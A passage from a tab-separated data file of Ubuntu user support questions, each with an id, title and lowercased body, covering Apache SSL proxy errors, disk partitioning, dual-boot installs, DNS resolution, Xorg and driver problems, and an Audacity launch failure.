401121	ssl reverse proxy not working after upgrade from apache 2.2.14 to 2.2.22	after upgrading my apache to 2.2.22 i can no longer connect to my internal servers by https . internal servers respond ok if i do n't use https , otherwise i get this on the apache log : [ mon jan 06 18:20:37 2014 ] [ info ] init : seeding prng with 648 bytes of entropy [ mon jan 06 18:20:37 2014 ] [ info ] loading certificate & private key of ssl-aware server [ mon jan 06 18:20:37 2014 ] [ info ] init : generating temporary rsa private keys ( 512/1024 bits ) [ mon jan 06 18:20:37 2014 ] [ info ] init : generating temporary dh parameters ( 512/1024 bits ) [ mon jan 06 18:20:37 2014 ] [ info ] shared memory session cache initialised [ mon jan 06 18:20:37 2014 ] [ info ] init : initializing ( virtual ) servers for ssl [ mon jan 06 18:20:37 2014 ] [ info ] configuring server for ssl protocol [ mon jan 06 18:20:37 2014 ] [ info ] mod_ssl/2.2.22 compiled against server : apache/2.2.22 , library : openssl/1.0.1 [ mon jan 06 18:20:37 2014 ] [ notice ] apache/2.2.22 ( ubuntu ) mod_ssl/2.2.22 openssl/1.0.1 configured -- resuming normal operations [ mon jan 06 18:20:37 2014 ] [ info ] server built : jul 12 2013 13:38:27 [ mon jan 06 18:22:37 2014 ] [ info ] [ client 111.111.111.97 ] connection to child 10 established ( server name.server.com:443 ) [ mon jan 06 18:22:37 2014 ] [ info ] seeding prng with 648 bytes of entropy [ mon jan 06 18:22:37 2014 ] [ info ] [ client 111.111.111.97 ] ( 70014 ) end of file found : ssl input filter read failed . [ mon jan 06 18:22:37 2014 ] [ info ] [ client 111.111.111.97 ] connection closed to child 10 with standard shutdown ( server name.server.com:443 ) [ mon jan 06 18:22:37 2014 ] [ info ] [ client 111.111.111.97 ] connection to child 65 established ( server name.server.com:443 ) [ mon jan 06 18:22:37 2014 ] [ info ] seeding prng with 648 bytes of entropy [ mon jan 06 18:22:37 2014 ] [ info ] initial ( no.1 ) https request received for child 65 ( server name.server.com:443 ) [ mon jan 06 18:22:37 2014 ] [ info ] [ client 172.111.111.47 ] connection to child 0 established ( server name.server.com:443 ) [ mon jan 06 18:22:37 2014 ] [ info ] seeding prng with 648 bytes of entropy [ mon jan 06 18:22:37 2014 ] [ info ] [ client 172.111.111.47 ] ssl proxy connect failed [ mon jan 06 18:22:37 2014 ] [ info ] ssl library error : 336130329 error:1408f119 : ssl routines : ssl3_get_record : decryption failed or bad record mac [ mon jan 06 18:22:37 2014 ] [ info ] [ client 172.111.111.47 ] connection closed to child 0 with abortive shutdown ( server name.server.com:443 ) [ mon jan 06 18:22:37 2014 ] [ error ] ( 502 ) unknown error 502 : proxy : pass request body failed to 172.111.111.47:443 ( 172.111.111.47 ) [ mon jan 06 18:22:37 2014 ] [ error ] [ client 111.111.111.97 ] proxy : error during ssl handshake with remote server returned by /app/login.jsp , referer : https : //name.server.com/app/login.jsp [ mon jan 06 18:22:37 2014 ] [ error ] proxy : pass request body failed to 172.111.111.47:443 ( 172.111.111.47 ) from 111.111.111.97 ( ) [ mon jan 06 18:22:37 2014 ] [ info ] [ client 111.111.111.97 ] connection closed to child 65 with standard shutdown ( server name.server.com:443 ) but , if i replace the current /usr/lib/apache2/modules/mod_ssl.so with the old apache 2.2.14 mod_ssl.so , it will work perfectly ( ! ) : [ mon jan 06 18:29:24 2014 ] [ notice ] sigusr1 received . doing graceful restart [ mon jan 06 18:29:24 2014 ] [ info ] init : seeding prng with 648 bytes of entropy [ mon jan 06 18:29:24 2014 ] [ info ] loading certificate & private key of ssl-aware server [ mon jan 06 18:29:24 2014 ] [ info ] init : generating temporary rsa private keys ( 512/1024 bits ) [ mon jan 06 18:29:24 2014 ] [ info ] init : generating temporary dh parameters ( 512/1024 bits ) [ mon jan 06 18:29:24 2014 ] [ info ] shared memory session cache initialised [ mon jan 06 18:29:24 2014 ] [ info ] init : initializing ( virtual ) servers for ssl [ mon jan 06 18:29:24 2014 ] [ info ] configuring server for ssl protocol [ mon jan 06 18:29:24 2014 ] [ info ] mod_ssl/2.2.14 compiled against server : apache/2.2.14 , library : openssl/0.9.8k [ mon jan 06 18:29:24 2014 ] [ notice ] apache/2.2.22 ( ubuntu ) mod_ssl/2.2.14 openssl/0.9.8o configured -- resuming normal operations [ mon jan 06 18:29:24 2014 ] [ info ] server built : jul 12 2013 13:38:27 [ mon jan 06 18:29:49 2014 ] [ info ] [ client 111.111.111.97 ] connection to child 197 established ( server name.server.com:443 ) [ mon jan 06 18:29:49 2014 ] [ info ] seeding prng with 648 bytes of entropy [ mon jan 06 18:29:49 2014 ] [ info ] [ client 111.111.111.97 ] ( 70014 ) end of file found : ssl input filter read failed . [ mon jan 06 18:29:49 2014 ] [ info ] [ client 111.111.111.97 ] connection closed to child 197 with standard shutdown ( server name.server.com:443 ) [ mon jan 06 18:29:49 2014 ] [ info ] [ client 111.111.111.97 ] connection to child 128 established ( server name.server.com:443 ) [ mon jan 06 18:29:49 2014 ] [ info ] seeding prng with 648 bytes of entropy [ mon jan 06 18:29:49 2014 ] [ info ] initial ( no.1 ) https request received for child 128 ( server name.server.com:443 ) [ mon jan 06 18:29:49 2014 ] [ info ] [ client 172.111.111.47 ] connection to child 0 established ( server name.server.com:443 ) [ mon jan 06 18:29:49 2014 ] [ info ] seeding prng with 648 bytes of entropy [ mon jan 06 18:29:50 2014 ] [ info ] subsequent ( no.2 ) https request received for child 128 ( server name.server.com:443 ) [ mon jan 06 18:29:50 2014 ] [ info ] [ client 111.111.111.97 ] connection to child 198 established ( server name.server.com:443 ) [ mon jan 06 18:29:50 2014 ] [ info ] seeding prng with 648 bytes of entropy [ mon jan 06 18:29:50 2014 ] [ info ] [ client 111.111.111.97 ] ( 70014 ) end of file found : ssl input filter read failed . [ mon jan 06 18:29:50 2014 ] [ info ] subsequent ( no.3 ) https request received for child 128 ( server name.server.com:443 ) [ mon jan 06 18:29:50 2014 ] [ info ] [ client 111.111.111.97 ] connection closed to child 198 with standard shutdown ( server name.server.com:443 ) [ mon jan 06 18:29:50 2014 ] [ info ] subsequent ( no.4 ) https request received for child 128 ( server name.server.com:443 ) [ mon jan 06 18:29:50 2014 ] [ info ] subsequent ( no.5 ) https request received for child 128 ( server name.server.com:443 ) [ mon jan 06 18:29:51 2014 ] [ info ] [ client 111.111.111.97 ] connection to child 129 established ( server name.server.com:443 ) [ mon jan 06 18:29:51 2014 ] [ info ] seeding prng with 648 bytes of entropy [ mon jan 06 18:29:55 2014 ] [ info ] [ client 111.111.111.97 ] ( 70007 ) the timeout specified has expired : ssl input filter read failed . [ mon jan 06 18:29:55 2014 ] [ info ] [ client 111.111.111.97 ] connection closed to child 128 with standard shutdown ( server name.server.com:443 ) apache 2.2.22 mod_ssl : root @ reverseserver : /etc # ldd /usr/lib/apache2/modules/mod_ssl.so linux-gate.so.1 = > ( 0xb76f6000 ) libssl.so.1.0.0 = > /lib/i386-linux-gnu/libssl.so.1.0.0 ( 0xb766a000 ) libcrypto.so.1.0.0 = > /lib/i386-linux-gnu/libcrypto.so.1.0.0 ( 0xb74bf000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xb74a3000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xb72f9000 ) libdl.so.2 = > /lib/i386-linux-gnu/libdl.so.2 ( 0xb72f4000 ) libz.so.1 = > /lib/i386-linux-gnu/libz.so.1 ( 0xb72de000 ) /lib/ld-linux.so.2 ( 0xb76f7000 ) apache 2.2.14 mod_ssl : root @ reverseserver : ~ # ldd /usr/lib/apache2/modules/mod_ssl.so linux-gate.so.1 = > ( 0xb77d1000 ) libssl.so.0.9.8 = > /lib/i386-linux-gnu/libssl.so.0.9.8 ( 0xb7750000 ) libcrypto.so.0.9.8 = > /lib/i386-linux-gnu/libcrypto.so.0.9.8 ( 0xb75d7000 ) libpthread.so.0 = > /lib/i386-linux-gnu/libpthread.so.0 ( 0xb75bb000 ) libc.so.6 = > /lib/i386-linux-gnu/libc.so.6 ( 0xb7411000 ) libdl.so.2 = > /lib/i386-linux-gnu/libdl.so.2 ( 0xb740c000 ) libz.so.1 = > /lib/i386-linux-gnu/libz.so.1 ( 0xb73f6000 ) /lib/ld-linux.so.2 ( 0xb77d2000 ) should i continue to use mod_ssl from version 2.2.14 ? is there any workaround for this issue ? any help would be greatly appreciated !
401125	how to partition a small ssd alongside an hdd when installing ubuntu	there is both a hdd and a 24gb ssd in my ultrabook . i will install windows ( for testing in feature , as its free in university ) in the hdd . i need to decide what to do with ubuntu , as its the system which i 'm using for education and for my job ( python developer ) . the ssd works very good , but some people write its not a good idea to install an operating system on an ssd . if i will use it as the main ubuntu partiton , the 24gb for system is not enough as its my primary system , and new games from valve is around 7 gb and in some years i will collect a lot data in system . i do n't like reinstalling ubuntu , its not windows : d. so , what is your idea ? to use all ssd as swap ( ram is 4gb ) and install all the system in hdd , to use part of ssd as swap and other part as /system , to use ssd as system and make partition for swap in hdd , or something else ?
401127	x11vnc video is choppy after upgrading from 10.04 to 12.04	hoping for some help . i just installed precise 12.04 moving from backtrack ( 10.04 ) connecting via x11vnc using 10.04 i was able to connect via vnc without any issues . now i get very choppy video streams and frequently losing characters while typing . i am connecting with ultravnc and tightvnc on a few different hosts and same issue any ideas what could be the issue ? everything worked fine using default settings with 10.04 ...
401130	booting from ubuntu iso cd - windows 7 partitioning	do i partition windows 7 hard disk before i install ubuntu using disk utility in windows 7 ? or do i do it with my ubuntu iso cd after booting ? and can i choose the size of the partition using ubuntu iso cd ?
401131	ubuntu 12.04 lts installer doesnt see windows 7	i am trying to install ubuntu 12.04 lts on my new laptop that came with windows 7 . i would like a dual-boot , but the installer ca n't see the windows 7 installation . what should i do here ? i have n't been able to find a decisive answer online which the installer to see my installation . the output of fdisk -l gives me disk /dev/sda : 3879 mb , 3879731200 bytes 120 heads , 62 sectors/track , 1018 cylinders , total 7577600 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a4339 device boot start end blocks id system /dev/sda1 * 62 7573919 3786929 c w95 fat32 ( lba ) disk /dev/sdb : 180.0 gb , 180045766656 bytes 255 heads , 63 sectors/track , 21889 cylinders , total 351651888 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x58311bd3 device boot start end blocks id system /dev/sdb1 * 2048 3074047 1536000 7 hpfs/ntfs/exfat /dev/sdb2 3074048 294836223 145881088 7 hpfs/ntfs/exfat /dev/sdb3 294836224 336969727 21066752 7 hpfs/ntfs/exfat /dev/sdb4 336969728 351649791 7340032 84 os/2 hidden c : drive
401132	how can i install django for python 3.x ?	i installed django with this command : sudo apt-get install python-django and it installed version 1.5.4-1ubuntu1 . the django docs say that as of version 1.5 , django supports python 3 . yet when i run the python 3 interpreter and try importing django , it says there 's no such module . i tried looking for a python3 version of django , but no such package exists . how can i get django working on python3 ? i 'd prefer to use ubuntu packages instead of installing things manually .
401134	iomega external hdd not accessible	i have an iomega hdd of capacity 500 gb that works flawlessly on windows 7 , and i own the drive for approximately 3 years . however , i can not access the disk on ubuntu 12.04.3 lts . how can i check if the system recognizes the disk and mount it afterwards . i would appreciate any help and guidance you can provide on this matter . the model number of my drive is 31868600 , ubuntu is 32-bit . the output of fdisk -l : without the hdd attached $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x07f2837e device boot start end blocks id system /dev/sda1 63 212991 106464+ de dell utility /dev/sda2 * 212992 41172991 20480000 7 hpfs/ntfs/exfat /dev/sda3 41172992 303323264 131075136+ 7 hpfs/ntfs/exfat /dev/sda4 303323326 976773119 336724897 f w95 ext 'd ( lba ) /dev/sda5 303323328 869550254 283113463+ 7 hpfs/ntfs/exfat /dev/sda6 869552128 926437375 28442624 83 linux /dev/sda7 968384512 976773119 4194304 82 linux swap / solaris /dev/sda8 926439424 968382463 20971520 83 linux partition table entries are not in disk order with the hdd attached $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x07f2837e device boot start end blocks id system /dev/sda1 63 212991 106464+ de dell utility /dev/sda2 * 212992 41172991 20480000 7 hpfs/ntfs/exfat /dev/sda3 41172992 303323264 131075136+ 7 hpfs/ntfs/exfat /dev/sda4 303323326 976773119 336724897 f w95 ext 'd ( lba ) /dev/sda5 303323328 869550254 283113463+ 7 hpfs/ntfs/exfat /dev/sda6 869552128 926437375 28442624 83 linux /dev/sda7 968384512 976773119 4194304 82 linux swap / solaris /dev/sda8 926439424 968382463 20971520 83 linux partition table entries are not in disk order disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc5d05dc6 device boot start end blocks id system /dev/sdb1 63 976768064 488384001 7 hpfs/ntfs/exfat
401135	vmware player bridged does not work when on vpn	the problem i am having now is i vpn off from my job to a vpn provider . i then load my kali linux vm and connect to the vpn my security labs . i can run scans , enumerations etc . the problem is when i go to run a bind_tcp /reverse shell whatever it will never open the session and with wireshark i start to notice tcp retransmission packets . the very weird thing about this is if i do the exact same thing from home it works fine no problems . when i am at home bridged network in my vm works fine . when i am vpned off at work it does not work i have to change it to nat to even get internet access in my vm . i am using vmware player on ubuntu 12.04 lts .
401138	share folder from ubuntu virtualbox to windows host	my host is windows 7 , and vm is ubuntu 12.04 . i use it for web development and i need to make git repo from virtual hdd visible for the host os to edit files on the host . what is the best way to do it ?
401140	system hangs during boot at `` starting mysql server [ ok ] ''	i have ubuntu 12.04 installed on my machine ( dual boot ) . it was working fine till today . i executed the following commands in the terminal , and when i restarted i get a purple screen of death . sudo apt-get autoremove i also had qt designer installed , so i removed it using sudo apt-get remove qt4-dev-tools sudo apt-get remove qt4-docs sudo apt-get remove qt4-assistant sudo apt-get remove qt4-linguist i had already tried the following : in recovery mode , it always hangs at this part . * starting mysql server [ ok ] from a ubuntu forum post , i tried doing ctrl+alt+f1 and then sudo apt-get update sudo apt-get upgrade sudo apt-get install fglrx sudo aticonfig -- initial but this always ends with aticonfig : no supported adapters detected . any help would be greatly appreciated . p.s : please do not mark this as duplicate as i 've gone through many threads and i 'm not able to find a solution myself . edit : it now hangs at checking battery state itself : ( . i 've referred to this http : //ubuntuforums.org/showthread.php ? t=1606130 but i 'm unable to find any solution .
401142	dual wan in ubuntu for 2 different proxy servers in one ubuntu	i have squid installed in ubuntu . it had 1 lan & 1 wan and its working like charm . but on that isp , some sites are blocked . so i got another internet link and it is wan2 in ubuntu . now i want to tell squid to open youtube.com from wan2 and other sites from wan . or , i install another proxy in same system and use wan2 for this proxy . and then , will use cache_peer in squid , pointing to that other proxy ip & port . so this way i can filter what i want , opening youtube from that wan2 & other sites from wan . but problem is , it by default both proxies listen to wan only . unless i disconnect wan then wan2 start working . so in both ways , please guide me to do my desired work done . i heard it could be achieved by iptable configuration or policy based routing , but i dont know how . please guide me or give me some hints/online resources to accomplish this . thanks a lot !
401145	ubuntu 12.04 login problem	i have a computer with pre-installed windows 8 and now there i also have ubuntu . when you log in if you enter your password , ubuntu restarts ( but not the computer ) . when there 's another dam , he says it is wrong . neither host can not login . when i start ubuntu there twice shows `` disabled by bios '' . i worked three days but then it no longer worked . sorry for bad english .
401146	why does my external hdd unmount itself ?	i 'm using ubuntu 13.04 and i 've got an external hdd connected to my pc via usb 2.0 . when i mount the hdd after booting , everything works in the first few minutes . but when i start copying files from my internal to the external hdd , after a few minutes my external hdd unmounts and disappers in the device-list . it 's not visible anywhere in my system although its connected . so i ca n't mount it again . to use it again i have to unplug it ( usually only the usb , but sometimes also the power-connection ) and plug it in again after a few minutes . but when i start copying files again , the sme happens . what is wrong with my pc or my setup ? is it a bug of ubuntu ( that maybe fixed ) or is my hdd broken ?
401148	i lost external hard data after linux reinstall	linux reinstallation mount the external hard reinstalling existing linux ( pomeroy ago ) nwatdeon data are transferred to external hard drive is not visible . disk space , the backup data will remain pointin state . can you see the problem is the file permissions after reinstallation is not reopened how is there any way to recover ? df -h 78g used.. /dev/sdb1 917g 78g 793g 9 % /mnt/sdb1 mount media/nas ls -al `` media/nas '' invisible .
401149	strange bind resolution problem	i 'm experiencing an odd resolution issue on my dns servers . i have a couple decades experience with administering windows dns servers , but have less than a year 's experience administering ubuntu/bind 9 servers . a little background on my environment : i work for a small service provider and administer three ubuntu/bind 9 servers . they are configured as a master and two slaves . all three servers are configured with private ip addresses on a vlan reserved for servers , with static nats on our firewall to the slaves . the slaves are accessible from both our internal network and the public internet , but public recursion is limited to the ip subnets we host . the master only allows access from the two slaves and from our internal managment vlan . the master and slave2 are ubuntu 12.04 running bind 9.8.1-p1 . slave1 is an older system , scheduled for replacement , running ubuntu 9.04 and bind 9.8.1-p1 . i am seeing the same problem behavior on both slaves . i built the master and slave2 , and inherited slave1 from a previous admin . here 's the problem : if i do a nslookup from a system on one of our hosted ip subnets for office365.com. , i get a successful resolution . if i try to resolve outlook.office365.com. , i get the following error : ***unknown ca n't find outlook.office365.com . : unspecified error i can successfully resolve , through nslookup , both of those urls from a system on the server vlan and from the console of both slave servers . this problem was reported to me by a client who stated that he 's seen this issue on a handful of urls , but outlook.office365.com is the only one he could specifically remember . i 've tried a number of other urls and they all resolve successfully . i can only replicate the issue with that one url . ( hopefully the client will remember some more . ) i setup a query.log , based on an article i found on this site , and see the request come in regardless of where it originates . example : client myipaddress # 1067 : query : outlook.office365.com in a + ( bindserveripaddress ) if i change my dns server to 8.8.8.8 or 4.2.2.2 , it resolves correctly ; adding both of those as forwarders on my bind servers does n't fix the problem . i 've checked my syslog , but see no entries regarding that query that could offer clues . i also tried allowing recursion from `` any '' , but same issue . i 've also reviewed our firewall rule set and do n't see anything that could account for this . it seems that if an access-list was the problem , no dns queries would work . anyone have any ideas ? is there a way to log a reason for a query failure ?
401151	no screens found on boot : xserver initial setup	setup : i am a relatively new linux user but i decided to dual boot my new laptop with windows 8.1 and ubuntu . i created a bootable usb using pen drive linux installer ( http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows ) ( 12.10 ) and put a clean install on a separate partition that i created on my main hdd . now when i boot from grub it just goes to a black screen . hardware : lenovo y410p - intel core i7 and an nvidia card . i do n't really care about getting the nvidia card working , i 've been focused on just getting integrated graphics going . what i 've tried : for the most part i have been using suggestions from this article ( http : //community.linuxmint.com/tutorial/view/842 ) . so i have tried nomodeset , i915.modeset=0 and various others . most simply boot to a black screen . if i include nomodeset and grub_gfxmode=1024x768x16 i get dropped to a command line , if i use the native resolution of the monitor i get a black screen . from the command line i took a look at my xorg.0.log and a snippet is below , i can include the full version if you think it will help but this appears to be where it goes awry . [ 23.409 ] ( == ) matched intel as autoconfigured driver 0 [ 23.409 ] ( == ) matched vesa as autoconfigured driver 1 [ 23.409 ] ( == ) matched modesetting as autoconfigured driver 2 [ 23.410 ] ( == ) matched fbdev as autoconfigured driver 3 [ 23.410 ] ( == ) assigned the driver to the xf86configlayout [ 23.410 ] ( ii ) loadmodule : `` intel '' [ 23.410 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 23.449 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 23.449 ] compiled for 1.13.3 , module version = 2.21.6 [ 23.449 ] module class : x.org video driver [ 23.449 ] abi class : x.org video driver , version 13.1 [ 23.449 ] ( ii ) loadmodule : `` vesa '' [ 23.449 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 23.463 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 23.463 ] compiled for 1.13.3 , module version = 2.3.2 [ 23.463 ] module class : x.org video driver [ 23.463 ] abi class : x.org video driver , version 13.1 [ 23.463 ] ( ii ) loadmodule : `` modesetting '' [ 23.463 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 23.473 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 23.473 ] compiled for 1.13.3 , module version = 0.7.0 [ 23.473 ] module class : x.org video driver [ 23.473 ] abi class : x.org video driver , version 13.1 [ 23.473 ] ( ii ) loadmodule : `` fbdev '' [ 23.473 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 23.480 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 23.480 ] compiled for 1.13.3 , module version = 0.4.3 [ 23.480 ] module class : x.org video driver [ 23.480 ] abi class : x.org video driver , version 13.1 [ 23.480 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , b43 , clarkdale , arrandale , sandybridge desktop ( gt1 ) , sandybridge desktop ( gt2 ) , sandybridge desktop ( gt2+ ) , sandybridge mobile ( gt1 ) , sandybridge mobile ( gt2 ) , sandybridge mobile ( gt2+ ) , sandybridge server , ivybridge mobile ( gt1 ) , ivybridge mobile ( gt2 ) , ivybridge desktop ( gt1 ) , ivybridge desktop ( gt2 ) , ivybridge server , ivybridge server ( gt2 ) , hd graphics , hd graphics 4600 , haswell desktop ( gt3 ) , hd graphics , hd graphics 4600 , haswell mobile ( gt3 ) , hd graphics , hd graphics p4600/p4700 , haswell server ( gt3 ) , haswell ( gt1 ) , haswell ( gt2 ) , haswell ( gt3 ) , hd graphics , haswell ( gt2 ) , haswell ( gt3 ) , haswell sdv desktop ( gt1 ) , haswell sdv desktop ( gt2 ) , haswell sdv desktop ( gt3 ) , haswell sdv mobile ( gt1 ) , haswell sdv mobile ( gt2 ) , haswell sdv mobile ( gt3 ) , haswell sdv server ( gt1 ) , haswell sdv server ( gt2 ) , haswell sdv server ( gt3 ) , haswell sdv ( gt1 ) , haswell sdv ( gt2 ) , haswell sdv ( gt3 ) , haswell sdv ( gt1 ) , haswell sdv ( gt2 ) , haswell sdv ( gt3 ) , haswell ult desktop ( gt1 ) , haswell ult desktop ( gt2 ) , iris ( tm ) graphics 5100 , hd graphics , hd graphics 4400 , hd graphics 5000 , haswell ult server ( gt1 ) , haswell ult server ( gt2 ) , iris ( tm ) graphics 5100 , haswell ult ( gt1 ) , haswell ult ( gt2 ) , iris ( tm ) graphics 5100 , hd graphics , hd graphics 4200 , iris ( tm ) graphics 5100 , haswell crw desktop ( gt1 ) , hd graphics 4600 , iris ( tm ) pro graphics 5200 , haswell crw mobile ( gt1 ) , hd graphics 4600 , iris ( tm ) pro graphics 5200 , haswell crw server ( gt1 ) , haswell crw server ( gt2 ) , iris ( tm ) pro graphics 5200 , haswell crw ( gt1 ) , haswell crw ( gt2 ) , iris ( tm ) pro graphics 5200 , haswell crw ( gt1 ) , haswell crw ( gt2 ) , iris ( tm ) pro graphics 5200 , valleyview po board [ 23.480 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 23.480 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 23.480 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 23.480 ] ( ++ ) using vt number 7 [ 23.481 ] ( ww ) falling back to old probe method for modesetting [ 23.481 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 23.481 ] ( ww ) falling back to old probe method for fbdev [ 23.481 ] ( ii ) loading sub module `` fbdevhw '' [ 23.481 ] ( ii ) loadmodule : `` fbdevhw '' [ 23.482 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 23.488 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 23.488 ] compiled for 1.13.3 , module version = 0.0.2 [ 23.489 ] abi class : x.org video driver , version 13.1 [ 23.489 ] ( ii ) loading sub module `` vbe '' [ 23.489 ] ( ii ) loadmodule : `` vbe '' [ 23.489 ] ( ii ) loading /usr/lib/xorg/modules/libvbe.so [ 23.501 ] ( ii ) module vbe : vendor= '' x.org foundation '' [ 23.501 ] compiled for 1.13.3 , module version = 1.1.0 [ 23.501 ] abi class : x.org video driver , version 13.1 [ 23.501 ] ( ii ) loading sub module `` int10 '' [ 23.501 ] ( ii ) loadmodule : `` int10 '' [ 23.501 ] ( ii ) loading /usr/lib/xorg/modules/libint10.so [ 23.516 ] ( ii ) module int10 : vendor= '' x.org foundation '' [ 23.516 ] compiled for 1.13.3 , module version = 1.0.0 [ 23.516 ] abi class : x.org video driver , version 13.1 [ 23.516 ] ( ii ) vesa ( 0 ) : initializing int10 [ 23.516 ] ( ee ) vesa ( 0 ) : v_bios address 0x0 out of range [ 23.516 ] ( ii ) unloadmodule : `` vesa '' [ 23.516 ] ( ii ) unloadsubmodule : `` int10 '' [ 23.516 ] ( ii ) unloading int10 [ 23.516 ] ( ii ) unloadsubmodule : `` vbe '' [ 23.516 ] ( ii ) unloading vbe [ 23.516 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 23.516 ] fatal server error : [ 23.516 ] no screens found [ 23.516 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 23.516 ] ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 23.516 ] ( ee ) [ 23.524 ] server terminated with error ( 1 ) . closing log file . thanks in advance for the assistance . any other information you need feel free to ask and i 'll add it .
401160	ubuntu compatible avec en cpu amd a8-4500m apu with tm hd graphics 1.90 ghz	je cherche a installer ubuntu ( n importe quel version ) mais compatible avec un cpu amd a8-4500m apu with tm hd graphics 1.90 ghz translation : iâm looking for a ubuntu installer ( does n't matter which version ) that is compatible with a cpu amd a8-4500m apu with tm hd graphics 1.90 ghz
401165	apache not working	i dont know how to fix this error : apache2 : syntax error on line 238 of /etc/apache2/apache2.conf : could not open configuration file /etc/phpmymin/apache2.conf : no such file or directory
401166	amd driver unzip problem	so i 'm trying to install the new amd drivers but i ca n't seem to unzip them any idea how to do this ? here is my out put archive : amd-catalyst-13.12-linux-x86.x86_64.zip end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . unzip : can not find zipfile directory in one of amd-catalyst-13.12-linux-x86.x86_64.zip or amd-catalyst-13.12-linux-x86.x86_64.zip.zip , and can not find amd-catalyst-13.12-linux-x86.x86_64.zip.zip , period .
401167	why grub2 wont boot from external hdd ?	i installed ubuntu 13.10 from a bootable live usb stick into a new 2tb usb hdd . the drive came with a 100mb `` raw '' partition and a ntfs one . i deleted the ntfs and created an ext4 and swap ( sde3 and sde5 ) . installation completed successfully but when trying to boot from the usb hdd , grub starts as expected but soon enters rescue mode . i 've read some questions here and some forum topics but cant figure out this ... . boot-repair output just in case http : //paste.ubuntu.com/6705167/ the usb drive is dev/sde . i have a lot a hdds and a fake raid but do n't bother looking at them , pretend my pc has no internal drives . all i want is to be able to have a `` non-live '' bootable ubuntu on a external drive 's partition . thx in advance . ps : already seen links how to move ubuntu 12.04lts from usb to hdd why ca n't i boot from portable hd ? can i install ubuntu to a partition on my portable hard drive ? help ! booting ubuntu off portable hdd , lots of issues with grub
401173	is a skype account needed to talk via sip ?	i want to be able to use the voice chat abilities of skype , but i 'd rather not sign up for another online service , privacy and all that . so , i have been looking around and came across sip , and would like to use jitsi ( or , if anyone has a better sip client , please comment - empathy is another i am looking at ) just for voice ( no video needed . ) i have googled quite a bit and ca n't seem to find any sources . basically , do i need a skype ( or any other site for that matter ) account to talk to someone who is using a skype account ?
401174	best option for recording minecraft server play ?	i am planning on doing some server minecraft screen recording just for fun , and so i 've been looking around at what there is to offer . i know fraps wo n't work on ubuntu and i 'd rather not spend the $ 30 for it anyways , so i looked around and found glc , which i thought looked good . i then googled some more and found this question : fraps like programs for ubuntu ? and there are two answers , one suggesting glc ( which i knew about ) , and another suggesting gtk-recordmydesktop ( also knew about ) and vlc streaming ( did not know about ) . my question is , which of these would have the least impact on ram and still record my video at good ( minimum 360p ) quality and get sound from voice chat through an sip client on my system ( sip=session initiation protocol - i would be using jitsi or empathy ) connected to my friend ( s ) using skype .
401178	audacity will no longer launch	when trying to launch audacity , i get the following error : audacity could not find a place to store temporary files . please enter an appropriate directory in the preferences dialog . no files or folder have been moved . i have purged audacity , deleted any files , etc manually and re-installed in terminal : pst007x @ pst007x-serval-professional : ~ $ audacity ( process:16390 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :sm-connect after class was initialised ( process:16390 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :show-crash-dialog after class was initialised ( process:16390 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :display after class was initialised ( process:16390 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :default-icon after class was initialised ** ( audacity:16390 ) : warning ** : owner of /tmp/orbit-pst007x is not the current user segmentation fault pst007x @ pst007x-serval-professional : ~ $ i have not changed any users or added any additional users . all privaleges , etc are default . ubuntu 13.10 64bit ( all updates applied ) additional : i can open as gksu audacity so it looks like privileges is an issue somewhere . i have checked all privileges and all seems ok , but clearly not ... . i tried changing the directory in preferences to a directory in my home folder : /home/pst007x/music/audacity_temp/ but when starting again ( not in root ) same error ... any ideas what files could be lacking privileges ? after changing the 